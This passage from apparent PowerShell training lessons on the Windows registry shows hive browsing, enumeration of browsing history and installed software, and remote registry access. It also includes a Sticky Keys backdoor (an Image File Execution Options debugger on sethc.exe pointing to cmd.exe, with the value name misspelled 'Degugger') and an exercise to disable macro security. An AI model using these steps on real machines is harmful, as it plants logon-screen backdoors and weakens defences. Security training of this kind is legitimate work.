NSimSun : 32902\n\t DotumChe : 36993\n\t SMALL FONTS : 2048\n\t SimSun : 134\n\t @Gulim : 8321\n\t MS SANS SERIF : 4096\n\t FIXEDSYS : 36864\n\t @Dotum : 12417\n\t COURIER : 34816\n\t PMingLiU : 136\n\t @MingLiU : 41096\n\t @SimSun : 8326\n\t GulimChe : 32897\n\t MS PGothic : 128\n\t SYMBOL : 16386\n\t @Gungsuh : 28801\n\t ARIAL : 0\n\t Dotum : 4225\n\t Gungsuh : 20609\n\t WINGDINGS : 2\n\t GungsuhChe : 53377\n\t Gulim : 129\n\t MS PMincho : 16512\n\t MS Mincho : 49280\n\t MS SERIF : 20480\n\t @NSimSun : 41094\n\t COURIER NEW : 32768\n\t @GungsuhChe : 61569\n\t SYMBOL1 : 40962\n\t TIMES NEW ROMAN : 16384\n\t Batang : 16513\n\t DEFAULT : 0\n\tFonts SimSun-ExtB (TrueType) : simsunb.ttf\n\t KodchiangUPC Bold (TrueType) : upckb.ttf\n\t Kokila Bold (TrueType) : kokilab.ttf\n\t Shonar Bangla (TrueType) : Shonar.ttf\n\t Mangal (TrueType) : mangal.ttf\n\t BrowalliaUPC Bold Italic (TrueType) : browauz.ttf\n\t Sakkal Majalla Bold (TrueType) : majallab.ttf\n\t LilyUPC Bold Italic (TrueType) : upclbi.ttf\n\t Palatino Linotype Bold (TrueType) : palab.ttf\n\t MoolBoran (TrueType) : moolbor.ttf\n\t Franklin Gothic Medium Italic (TrueType) : framdit.ttf\n\t Cordia New (TrueType) : cordia.ttf\n\t Arial Italic (TrueType) : ariali.ttf\n\t Kokila Italic (TrueType) : kokilai.ttf\n\t AngsanaUPC Italic (TrueType) : angsaui.ttf\n\t JasmineUPC (TrueType) : upcjl.ttf\n\t Trebuchet MS Bold (TrueType) : trebucbd.ttf\n\t Microsoft Tai Le (TrueType) : taile.ttf\n\t Utsaah (TrueType) : utsaah.ttf\n\t Malgun Gothic (TrueType) : malgun.ttf\n\t Simplified Arabic Fixed (TrueType) : simpfxo.ttf\n\t Gisha (TrueType) : gisha.ttf\n\t Utsaah Bold Italic(TrueType) : utsaahbi.ttf\n\t Microsoft JhengHei Light (TrueType) & Microsoft JhengHei UI Light (TrueType) : msjhl.ttc\n\t Comic Sans MS Bold (TrueType) : comicbd.ttf\n\t BrowalliaUPC (TrueType) : browau.ttf\n\t Segoe UI Symbol (TrueType) : seguisym.ttf\n\t Kokila (TrueType) : kokila.ttf\n\t Vrinda Bold (TrueType) : vrindab.ttf\n\t FreesiaUPC Bold Italic (TrueType) : upcfbi.ttf\n\t Traditional Arabic Bold (TrueType) : tradbdo.ttf\n\t Aparajita Bold (TrueType) : aparajb.ttf\n\t Sitka Bold Italic : SitkaZ.ttc\n\t Nirmala UI Semilight (TrueType) : NirmalaS.ttf\n\t Leelawadee UI Bold (TrueType) : leelauib.ttf\n\t KodchiangUPC Bold Italic (TrueType) : upckbi.ttf\n\t Gadugi Bold (TrueType) : gadugib.ttf\n\t Microsoft New Tai Lue (TrueType) : ntailu.ttf\n\t DokChampa (TrueType) : dokchamp.ttf\n\t Palatino Linotype Bold Italic (TrueType) : palabi.ttf\n\t Segoe UI Italic (TrueType) : segoeuii.ttf\n\t Calibri Bold (TrueType) : calibrib.ttf\n\t Cordia New Bold Italic (TrueType) : cordiaz.ttf\n\t Miriam (TrueType) : mriam.ttf\n\t Angsana New Bold (TrueType) : angsab.ttf\n\t Iskoola Pota (TrueType) : iskpota.ttf\n\t FreesiaUPC (TrueType) : upcfl.ttf\n\t Kartika (TrueType) : kartika.ttf\n\t Segoe UI Semilight (TrueType) : segoeuisl.ttf\n\t Vijaya (TrueType) : vijaya.ttf\n\t Nirmala UI (TrueType)...\n\tFontSubstitutes Arabic Transparent,0 : Arial,178\n\t Arabic Transparent Bold,0 : Arial Bold,178\n\t Arabic Transparent Bold : Arial Bold\n\t Rod Transparent : Rod\n\t Courier New CYR,204 : Courier New,204\n\t Times New Roman CYR,204 : Times New Roman,204\n\t Helvetica : Arial\n\t Arial CE,238 : Arial,238\n\t MS Shell Dlg 2 : Tahoma\n\t David Transparent : David\n\t Courier New TUR,162 : Courier New,162\n\t Times New Roman TUR,162 : Times New Roman,162\n\t Times : Times New Roman\n\t Miriam Transparent : Miriam\n\t Times New Roman CE,238 : Times New Roman,238\n\t Arial Greek,161 : Arial,161\n\t KaiTi_GB2312 : KaiTi\n\t Courier New CE,238 : Courier New,238\n\t Arial Baltic,186 : Arial,186\n\t Tahoma Armenian : Tahoma\n\t FangSong_GB2312 : FangSong\n\t Arial TUR,162 : Arial,162\n\t Tms Rmn : MS Serif\n\t Courier New Greek,161 : Courier New,161\n\t Times New Roman Baltic,186 : Times New Roman,186\n\t Arial CYR,204 : Arial,204\n\t Arabic Transparent : Arial\n\t Helv : MS Sans Serif\n\t Courier New Baltic,186 : Courier New,186\n\t Times New Roman Greek,161 : Times New Roman,161\n\t Fixed Miriam Transparent : Miriam Fixed\n\t MS Shell Dlg : Microsoft Sans Serif\n\tGRE_Initialize DisableRemoteFontBootCache : 0\n\t ServicingStackModifiedFonts : 2\n\tICM\n\tImage File Execution Options\n\tIniFileMapping\n\tInstalledFeatures\n\tKnownFunctionTableDlls C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscordacwks.dll : 0\n\tKnownManagedDebuggingDlls C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscordacwks.dll : 0\n\t C:\\Windows\\System32\\mrt_map.dll : 0\n\tLanguagePack OpenType : 0\n\tMCI Extensions aiff : MPEGVideo\n\t dat : MPEGVideo\n\t m2t : MPEGVideo\n\t mpa : MPEGVideo\n\t wmx : MPEGVideo\n\t wmv : MPEGVideo\n\t Mid : Sequencer\n\t m3u : MPEGVideo\n\t avi : avivideo\n\t ivf : MPEGVideo\n\t wvx : MPEGVideo\n\t m4v : MPEGVideo\n\t mts : MPEGVideo\n\t mp4v : MPEGVideo\n\t mp2v : MPEGVideo\n\t adts : MPEGVideo\n\t wma : MPEGVideo\n\t mpeg : MPEGVideo\n\t tts : MPEGVideo\n\t mpv2 : MPEGVideo\n\t au : MPEGVideo\n\t 3gpp : MPEGVideo\n\t m4a : MPEGVideo\n\t wax : MPEGVideo\n\t aif : MPEGVideo\n\t asx : MPEGVideo\n\t m2ts : MPEGVideo\n\t mov : MPEGVideo\n\t Wav : WaveAudio\n\t aac : MPEGVideo\n\t wpl : MPEGVideo\n\t 3gp2 : MPEGVideo\n\t mp4 : MPEGVideo\n\t mp3 : MPEGVideo\n\t mp2 : MPEGVideo\n\t wm : MPEGVideo\n\t adt : MPEGVideo\n\t cda : CDAudio\n\t 3g2 : MPEGVideo\n\t asf : MPEGVideo\n\t mod : MPEGVideo\n\t m1v : MPEGVideo\n\t ts : MPEGVideo\n\t rmi : Sequencer\n\t mpg : MPEGVideo\n\t 3gp : MPEGVideo\n\t aifc : MPEGVideo\n\t mpe : MPEGVideo\n\t m2v : MPEGVideo\n\t snd : MPEGVideo\n\tMCI32 AVIVideo : mciavi32.dll\n\t Sequencer : mciseq.dll\n\t CDAudio : mcicda.dll\n\t WaveAudio : mciwave.dll\n\t MPEGVideo : mciqtz32.dll\n\tMiniDumpAuxiliaryDlls C:\\Windows\\system32\\jscript9.dll : C:\\Windows\\System32\\jscript9diag.dll\n\t C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll : C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscordacwks.dll\n\t C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll : C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscordacwks.dll\n\t C:\\Windows\\system32\\mrt100.dll : C:\\Windows\\System32\\mrt_map.dll\n\tMsiCorruptedFileRecovery\n\tMultimedia\n\tNetworkCards\n\tNetworkList (default) : 192.228.79.201\n\t RootDnsIpv6Addr : 2001:478:65::53\n\t FirstNetwork : 0\n\tNoImeModeImes\n\tNotifications\n\tNtVdm64\n\tOpenGLDrivers\n\tPeerDist\n\tPerflib Version : 65537\n\t Last Help : 8909\n\t Last Counter : 8908\n\t Base Index : 1847\n\t ExtCounterTestLevel : 4\n\tPorts LPT1: :\n\t COM3: : 9600,n,8,1\n\t LPT2: :\n\t COM4: : 9600,n,8,1\n\t LPT3: :\n\t PORTPROMPT: :\n\t FILE: :\n\t COM1: : 9600,n,8,1\n\t COM2: : 9600,n,8,1\n\t Ne00: :\n\tPrint DoNotInstallCompatibleDriverFromWindowsUpdate : 1\n\tProfileGuid\n\tProfileList Default : C:\\Users\\Default\n\t ProfilesDirectory : C:\\Users\n\t ProgramData : C:\\ProgramData\n\t Public : C:\\Users\\Public\n\tProfileLoader\n\tProfileNotification Load : *\n\t Migrate : *\n\t Delete : *\n\t Upgrade : *\n\t Unload : *\n\t Create : *\n\trelated.desc wave :\n\tRemoteRegistry DisableIdleStop : 0\n\tSchedule DomainJoinDetected : 1\n\t MigrationCleanupCompleted : 1\n\t MTRCompleted : 1\n\t HashingCompleted : 1\n\tSCW (default) : C:\\Windows\\System32\\scw.exe\n\t Path : C:\\Windows\\security\\msscw\\\n\tSecEdit SetupCompDebugLevel : 1\n\t EnvironmentVariables : {%AppData%, %UserProfile%, %AllUsersProfile%, %ProgramFiles%...}\n\t DefaultTemplate : C:\\Windows\\Inf\\secrecs.inf\n\t LastUsedDatabase : C:\\WINDOWS\\Security\\Database\\secedit.sdb\n\t TemplateUsed : C:\\Windows\\inf\\defltdc.inf\n\t LastWinLogonConfig : 1184467804\n\tSensor\n\tServer\n\tsetup\n\tSoftwareProtectionPlatform VLRenewalInterval : 10080\n\t UserOperations : 0\n\t SkipRearm : 0\n\t VLActivationInterval : 120\n\t KeepRunningThresholdMins : 15\n\t TokenStore : %WINDIR%\\System32\\spp\\store\\2.0\n\t InactivityShutdownDelay : 30\n\t CacheStore : %WINDIR%\\System32\\spp\\store\\2.0\\cache\n\t ServiceSessionId : {34, 57, 148, 180...}\n\t LicStatusArray : {19, 111, 103, 229...}\n\t PolicyValuesArray : {52, 39, 201, 85...}\n\t actionlist : {139, 59, 15, 219...}\n\t HasOOBERun : 1\n\t WSServiceTlrTrigger : 1\n\tSuperfetch\n\tSvchost RPCSS : {RpcEptMapper, RpcSs}\n\t LocalService : {nsi, WdiServiceHost, w32time, EventSystem...}\n\t WepHostSvcGroup : {WepHostSvc}\n\t defragsvc : {defragsvc}\n\t KpsSvcGroup : {kpssvc}\n\t DcomLaunch : {Power, LSM, BrokerInfrastructure, PlugPlay...}\n\t LocalSystemNetworkRestricted : {WdiSystemHost, ScDeviceEnum, trkwks, AudioEndpointBuilder...}\n\t netsvcs : {AeLookupSvc, CertPropSvc, SCPolicySvc, lanmanserver...}\n\t WerSvcGroup : {wersvc}\n\t LocalServiceNoNetwork : {DPS, PLA, BFE, mpssvc}\n\t termsvcs : {TermService}\n\t swprv : {swprv}\n\t wsappx : {WSService, AppXSvc}\n\t ICService : {vmicheartbeat, vmicrdv}\n\t smphost : {smphost}\n\t LocalServiceNetworkRestricted : {DHCP, eventlog, AudioSrv, LmHosts...}\n\t LocalServicePeerNet : {PNRPSvc, p2pimsvc, p2psvc, PnrpAutoReg}\n\t NetworkServiceAndNoImpersonation : {KtmRm}\n\t regsvc : {RemoteRegistry}\n\t wcssvc : {WcsPlugInService}\n\t TapiSrv : {TapiSrv}\n\t LocalServiceAndNoImpersonation : {SSDPSRV, upnphost, SCardSvr, BthHFSrv...}\n\t NetworkServiceNetworkRestricted : {PolicyAgent}\n\t AppReadiness : {AppReadiness}\n\t NetworkService : {CryptSvc, nlasvc, lanmanworkstation, NapAgent...}\n\t print : {PrintNotify}\n\t utcsvc : {DiagTrack}\n\tTerminal Server\n\tTime Zones TzVersion : 132187136\n\tTracing\n\tUnattendSettings\n\tUserinstallable.drivers wave : wdmaud.drv\n\tWbemPerf\n\tWindows (default) : mnmsrvc\n\t Spooler : yes\n\t DeviceNotSelectedTimeout : 15\n\t TransmissionRetryTimeout : 90\n\t EnableDwmInputProcessing : 7\n\t ShutdownWarningDialogTimeout : 4294967295\n\t USERProcessHandleQuota : 10000\n\t LoadAppInit_DLLs : 0\n\t IconServiceLib : IconCodecService.dll\n\t DesktopHeapLogging : 1\n\t DdeSendTimeout : 0\n\t DwmInputUsesIoCompletionPort : 1\n\t USERPostMessageLimit : 10000\n\t USERNestedWindowLimit : 50\n\t AppInit_DLLs :\n\t NaturalInputHandler : Ninput.dll\n\t ThreadUnresponsiveLogTimeout : 500\n\t GDIProcessHandleQuota : 10000\n\t RequireSignedAppInit_DLLs : 1\n\t Win32kLastWriteTime : 1D2EB62FDEA7E06\n\tWindowsServerBackup\n\tWinlogon Userinit : C:\\Windows\\system32\\userinit.exe,\n\t LegalNoticeText :\n\t Shell : explorer.exe\n\t LegalNoticeCaption :\n\t DebugServerCommand : no\n\t ForceUnlockLogon : 0\n\t ReportBootOk : 1\n\t VMApplet : SystemPropertiesPerformance.exe /pagefile\n\t AutoRestartShell : 1\n\t PowerdownAfterShutdown : 0\n\t ShutdownWithoutLogon : 0\n\t Background : 0 0 0\n\t PreloadFontFile : SC-Load.All\n\t PasswordExpiryWarning : 5\n\t CachedLogonsCount : 10\n\t WinStationsDisabled : 0\n\t PreCreateKnownFolders : {A520A1A4-1780-4FF6-BD18-167343C5AF16}\n\t DisableCAD : 1\n\t scremoveoption : 0\n\t ShutdownFlags : 2147483751\n\t AutoLogonSID : S-1-5-32\n\t LastUsedUsername :\n\t DisableLockWorkstation : 0\n\t DefaultDomainName : PFPT\n\tWSService\n\tWUDF DefaultHostProcessGUID : {193a1820-d9ac-4997-8c55-be817523f6aa}\n\t Logkd : 0\n\t LogFlushPeriodSeconds : 300\n\t LogEnable : 0\n\t LogMinidumpType : 4384\n\t HostFailKdDebugBreak : 1\n\t LogFlags : 16777215\n\t LogLevel : 3\n\t NumDeviceStacksMax : 3\n\t\n\tPS C:\\>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\> Get-ChildItem 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Recurse\n\t```\n\t\n###### Accessing all Registry hives\n\n- ```Method 1```\n\n```PowerShell\nPS C:\\> Set-Location Registry::\n```\n\n```PowerShell\nPS Microsoft.PowerShell.Core\\Registry::> ls\n\n Hive:\n\n\nName Property\n---- --------\nHKEY_LOCAL_MACHINE\nHKEY_CURRENT_USER\nHKEY_CLASSES_ROOT\nHKEY_CURRENT_CONFIG\nHKEY_USERS\nHKEY_PERFORMANCE_DATA Global : {80, 0, 69, 0...}\n Costly : {80, 0, 69, 0...}\n\nPS Microsoft.PowerShell.Core\\Registry::>\n```\n\n```PowerShell\nPS Microsoft.PowerShell.Core\\Registry::> cd HKEY_CLASSES_ROOT\n```\n\n```PowerShell\nPS Microsoft.PowerShell.Core\\Registry::HKEY_CLASSES_ROOT>\n```\n\n- ```Method 2```\n\n```PowerShell\nPS C:\\> New-PSDrive -name RegistryDrive -PSProvider Registry -Root Registry::HKEY_CLASSES_ROOT\n\nName Used (GB) Free (GB) Provider Root CurrentLocation\n---- --------- --------- -------- ---- ---------------\nRegistr... Registry HKEY_CLASSES_ROOT\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> cd RegistryDrive:\n```\n\n```PowerShell\nPS RegistryDrive:\\> ls\n\n\n Hive: HKEY_CLASSES_ROOT\n\n\nName Property\n---- --------\n* ContentViewModeForBrowse :\n prop:~System.ItemNameDisplay;System.ItemTypeText;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;System.DateModified;System.Size\n ContentViewModeLayoutPatternForBrowse : delta\n SetDefaultsFor : prop:System.Author;System.Document.DateCreated\n InfoTip : prop:System.ItemTypeText;System.Size;System.DateModified\n ContentViewModeForSearch :\n prop:~System.ItemNameDisplay;~System.ItemFolderPathDisplay;~System.LayoutPattern.PlaceHolder;System.ItemTypeText;System.DateModified;System.Size\n ContentViewModeLayoutPatternForSearch : delta\n ConflictPrompt : prop:System.ItemTypeText;System.Size;System.DateModified;System.DateCreated\n AlwaysShowExt :\n ExtendedTileInfo : prop:System.ItemTypeText;System.Size;System.DateModified;System.OfflineAvailability\n FullDetails :\n prop:System.PropGroup.FileSystem;System.ItemNameDisplay;System.ItemTypeText;System.ItemFolderPathDisplay;System.Size;System.DateCreated;System.DateModified;System\n .FileAttributes;*System.OfflineAvailability;*System.OfflineStatus;*System.SharedWith;*System.FileOwner;*System.ComputerName\n PreviewTitle : prop:System.ItemNameDisplay;System.ItemTypeText\n QuickTip : prop:System.ItemTypeText;System.Size;System.DateModified\n NoStaticDefaultVerb :\n PreviewDetails : prop:System.DateModified;System.Size;System.DateCreated;*System.OfflineAvailability;*System.OfflineStatus;*System.SharedWith\n NoRecentDocs :\n TileInfo : prop:System.ItemTypeText;System.Size;System.DateModified\n.386 (default) : vxdfile\n PerceivedType : system\n.a\n.accountpicture-ms (default) : accountpicturefile\n Content Type : application/windows-accountpicture\n.ai Content Type : application/postscript\n.aif PerceivedType : audio\n```\n\n```PowerShell\nPS RegistryDrive:\\> Get-PSDrive\n\nName Used (GB) Free (GB) Provider Root CurrentLocation\n---- --------- --------- -------- ---- ---------------\nAlias Alias\nC 17.41 14.25 FileSystem C:\\\nCert Certificate \\\nD .06 FileSystem D:\\\nEnv Environment\nFunction Function\nHKCU Registry HKEY_CURRENT_USER\nHKLM Registry HKEY_LOCAL_MACHINE\nRegistr... Registry HKEY_CLASSES_ROOT\nVariable Variable\nWSMan WSMan\n\nPS RegistryDrive:\\>\n```\n\n###### Exercise\n\r- Get a list of [```TypedURLs```](http://www.wikihow.com/Clear-Internet-Explorer%27s-URL-History-by-Editing-the-Registry) from Windows Registry.\n\n```PowerShell\nPS C:\\> Get-Item 'HKCU:\\SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLs'\n\n Hive: HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\n\n\nName Property\n---- --------\nTypedURLs url1 : https://www.google.com/\n url2 : https://github.com/samratashok/nishang\n url3 : http://www.bing.com/search?q=nishang&FORM=IE8SRC\n url4 : http://go.microsoft.com/fwlink/p/?LinkId=255141\n\nPS C:\\>\n```\n\n- List all [```installed software```](https://social.technet.microsoft.com/Forums/windows/en-US/d913471a-d7fb-448d-869b-da9025dcc943/where-does-addremove-programs-get-its-information-from-in-the-registry?forum=w7itprogeneral) on a computer from Windows Registry\n\n```PowerShell\nPS C:\\> Get-ChildItem 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'\n\n Hive: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\n\n\nName Property\n---- --------\nAddressBook\nConnection Manager SystemComponent : 1\nDirectDrawEx\nFontcore\nIE40\nIE4Data\nIE5BAKEX\nIEData\nMobileOptionPack\nMozilla Firefox 54.0.1 (x64 Comments : Mozilla Firefox 54.0.1 (x64 en-US)\nen-US) DisplayIcon : C:\\Program Files\\Mozilla Firefox\\firefox.exe,0\n DisplayName : Mozilla Firefox 54.0.1 (x64 en-US)\n DisplayVersion : 54.0.1\n HelpLink : https://support.mozilla.org\n InstallLocation : C:\\Program Files\\Mozilla Firefox\n Publisher : Mozilla\n UninstallString : \"C:\\Program Files\\Mozilla Firefox\\uninstall\\helper.exe\"\n URLUpdateInfo : https://www.mozilla.org/firefox/54.0.1/releasenotes\n URLInfoAbout : https://www.mozilla.org\n NoModify : 1\n NoRepair : 1\n EstimatedSize : 103916\nMozillaMaintenanceService DisplayName : Mozilla Maintenance Service\n UninstallString : \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\uninstall.exe\"\n DisplayIcon : C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe,0\n DisplayVersion : 54.0.1\n Publisher : Mozilla\n Comments : Mozilla Maintenance Service\n NoModify : 1\n EstimatedSize : 278\nOracle VM VirtualBox Guest DisplayName : Oracle VM VirtualBox Guest Additions 5.1.22\nAdditions UninstallString : C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe\n DisplayVersion : 5.1.22.0\n URLInfoAbout : http://www.virtualbox.org\n Publisher : Oracle Corporation\nSchedulingAgent\nWIC NoRemove : 1\n\nPS C:\\>\n```" }, { "path": "37-Registry-and-Powershell-Part-2.md", "content": "#### 37. Registry and Powershell Part 2\n\n- ```Get-PSProvider```\n\n```PowerShell\nPS C:\\> Get-PSProvider\n\nName Capabilities Drives\n---- ------------ ------\nAlias ShouldProcess {Alias}\nEnvironment ShouldProcess {Env}\nFileSystem Filter, ShouldProcess, Credentials {C, D}\nFunction ShouldProcess {Function}\nRegistry ShouldProcess, Transactions {HKLM, HKCU}\nVariable ShouldProcess {Variable}\n\nPS C:\\>\n```\n\n- ```New-Item```\n\n```PowerShell\nPS C:\\> New-Item -Path 'HKCU:\\PFPT'\n\n Hive: HKEY_CURRENT_USER\n\n\nName Property\n---- --------\nPFPT\n\nPS C:\\> \n```\n\n```PowerShell\nPS C:\\> New-Item -Path 'HKCU:\\PFPT\\NewSubKey'\n\n Hive: HKEY_CURRENT_USER\\PFPT\n\n\nName Property\n---- --------\nNewSubKey\n\nPS C:\\>\n```\n\n- ```New-ItemProperty```\n\n```PowerShell\nPS C:\\> New-ItemProperty -Path 'HKCU:\\PFPT' -Name Reg2 -PropertyType String -Value 2\n\nReg2 : 2\nPSPath : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USER\\PFPT\nPSParentPath : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USER\nPSChildName : PFPT\nPSDrive : HKCU\nPSProvider : Microsoft.PowerShell.Core\\Registry\n\nPS C:\\>\n```\n\n- ```Rename-Item```\n\n```PowerShell\nPS C:\\> Rename-Item HKCU:\\PFPT\\NewSubKey -NewName RenamedSubKey\n```\n\n- ```Rename-Itemproperty```\n\n```PowerShell\nPS C:\\> Rename-ItemProperty HKCU:\\PFPT -Name Reg2 -NewName Reg3\n```\n\n- ```Set-ItemProperty```\n\n```PowerShell\nPS C:\\> Set-ItemProperty -Path HKCU:\\PFPT -Name Reg3 -Value 45\n```\n\n![Image of Registry](images/15.jpeg)\n\n- Attach the ```Degugger``` to the ```Sticky Keys``` executable\n\n```PowerShell\nPS C:\\> New-Item 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe'\n\n Hive: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\n\n\nName Property\n---- --------\nsethc.exe\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> New-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe' -Name Degugger -PropertyType String -Value cmd.exe\n\nDegugger : cmd.exe\nPSPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\nPSParentPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\nPSChildName : sethc.exe\nPSDrive : HKLM\nPSProvider : Microsoft.PowerShell.Core\\Registry\n\nPS C:\\>\n```\n\n###### Exercise\n\n- Write a script which:\r - Disables Macro Security by editing the Registry, if it is enabled.\r - Enables Macro Security, if it is not enabled" }, { "path": "38-Registry-and-Powershell-Part-3.md", "content": "#### 38. Registry and Powershell Part 3\n\n###### Windows Registry on Remote Computer\n\n###### Ways of access Registry on a remote computer\n\n- ```Enter-PSSession```\n\n```PowerShell\nPS C:\\> Enter-PSSession -ComputerName JOHN-PC -Credential John-PC\\John\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-Item 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n\n Hive: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\n\n\nSKC VC Name Property\n--- -- ---- --------\n 80 20 CurrentVersion {CurrentVersion, CurrentBuild, SoftwareType, CurrentType...}\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents> \n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n\nPSPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\nPSParentPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\nPSChildName : CurrentVersion\nPSDrive : HKLM\nPSProvider : Microsoft.PowerShell.Core\\Registry\nCurrentVersion : 6.1\nCurrentBuild : 7600\nSoftwareType : System\nCurrentType : Multiprocessor Free\nInstallDate : 1499805246\nRegisteredOrganization :\nRegisteredOwner : John\nSystemRoot : C:\\Windows\nInstallationType : Client\nEditionID : Ultimate\nProductName : Windows 7 Ultimate\nProductId : 00426-OEM-8992662-00497\nDigitalProductId : {164, 0, 0, 0...}\nDigitalProductId4 : {248, 4, 0, 0...}\nCurrentBuildNumber : 7600\nBuildLab : 7600.win7_rtm.090713-1255\nBuildLabEx : 7600.16385.x86fre.win7_rtm.090713-1255\nBuildGUID : e331ce24-377a-47bd-86de-92ae1aa1ae65\nCSDBuildNumber : 1\nPathName : C:\\Windows\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents>\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-ChildItem 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n\n Hive: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\n\n\nSKC VC Name Property\n--- -- ---- --------\n 1 0 Accessibility {}\n 0 0 AdaptiveDisplayBrightness {}\n 1 1 AeDebug {UserDebuggerHotKey}\n 0 10 APITracing {LogFileDirectory, InstalledManifests, LogApiNamesOnly, LogApisRecursively...}\n 6 1 AppCompatFlags {ApphelpUIExe}\n 0 1 ASR {OfflineDriverInjectionExtension}\n 1 0 Audit {}\n 0 1 BootMgr {KB935509}\n 0 174 Compatibility {_3DPC, _BNOTES, _LNOTES, ACAD...}\n 0 1 Compatibility32 {winword}\n 3 0 Console {}\n 1 2 CorruptedFileRecovery {RunCount, TraceLevel}\n 0 3 DefaultProductKey {ProductId, DigitalProductId, DigitalProductId4}\n 0 3 DefaultProductKey2 {ProductId, DigitalProductId, DigitalProductId4}\n 4 1 DeviceDisplayObjects {DeviceStatusPropertyDescriptionList}\n 2 0 DiskDiagnostics {}\n 0 1 Drivers {timer}\n 0 2 drivers.desc {C:\\Windows\\System32\\l3codeca.acm, wdmaud.drv}\n 0 20 Drivers32 {vidc.mrle, vidc.msvc, msacm.imaadpcm, msacm.msg711...}\n 0 0 EFS {}\n 0 0 EMDMgmt {}\n 0 3 Event Viewer {MicrosoftRedirectionProgram, MicrosoftRedirectionProgramCommandLineParameters, MicrosoftRedirectionURL}\n 0 1 Font Drivers {Adobe Type Manager}\n 0 2 Font Management {Metadata, Auto Deactivation Exclude}\n 0 1 FontDPI {LogPixels}\n 1 2 FontLink {FontLinkControl, FontLinkDefaultChar}\n 1 44 FontMapper {ARIAL, Batang, BatangChe, @Batang...}\n 0 244 Fonts {Arial (TrueType), Arial Italic (TrueType), Arial Bold (TrueType), Arial Bold Italic (TrueType)...}\n 0 32 FontSubstitutes {Arabic Transparent, Arabic Transparent Bold, Arabic Transparent,0, Arabic Transparent Bold,0...}\n 2 2 GRE_Initialize {DisableRemoteFontBootCache, LastBootTimeFontCacheState}\n 2 0 ICM {}\n 2 0 Image File Execution Options {}\n 5 0 IniFileMapping {}\n 1 0 InstalledFeatures {}\n 0 2 KnownFunctionTableDlls {C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscordacwks.dll, C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscordacwks.dll}\n 0 2 KnownManagedDebuggingDlls {C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscordacwks.dll, C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscordacwks.dll}\n 2 1 LanguagePack {OpenType}\n 0 4 MCI {AVIVideo, Sequencer, CDAudio, WaveAudio}\n 0 50 MCI Extensions {avi, cda, Mid, rmi...}\n 0 5 MCI32 {AVIVideo, CDAudio, Sequencer, WaveAudio...}\n 0 2 MiniDumpAuxiliaryDlls {C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll, C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll}\n 0 15 ModuleCompatibility {CWD, INSTBI01, INSTBI02, INSTBIN...}\n 1 0 MsiCorruptedFileRecovery {}\n 1 0 Multimedia {}\n 1 0 NetworkCards {}\n 5 2 NetworkList {(default), FirstNetwork}\n 0 0 NvCache {}\n 1 0 OpenGLDrivers {}\n 6 0 PeerDist {}\n 2 0 PeerNet {}\n 3 5 Perflib {Base Index, Version, Last Counter, Last Help...}\n131 1 PerHwIdStorage {LastUpdateTime}\n 1 0 PolicyGuid {}\n 0 11 Ports {COM1:, COM2:, COM3:, COM4:...}\n 0 3 Prefetcher {BootFilesOptimized, LastDiskLayoutTime, LastDiskLayoutTimeString}\n 5 1 Print {DoNotInstallCompatibleDriverFromWindowsUpdate}\n 1 0 ProfileGuid {}\n 5 4 ProfileList {ProfilesDirectory, Default, Public, ProgramData}\n 1 0 ProfileLoader {}\n 8 6 ProfileNotification {Create, Delete, 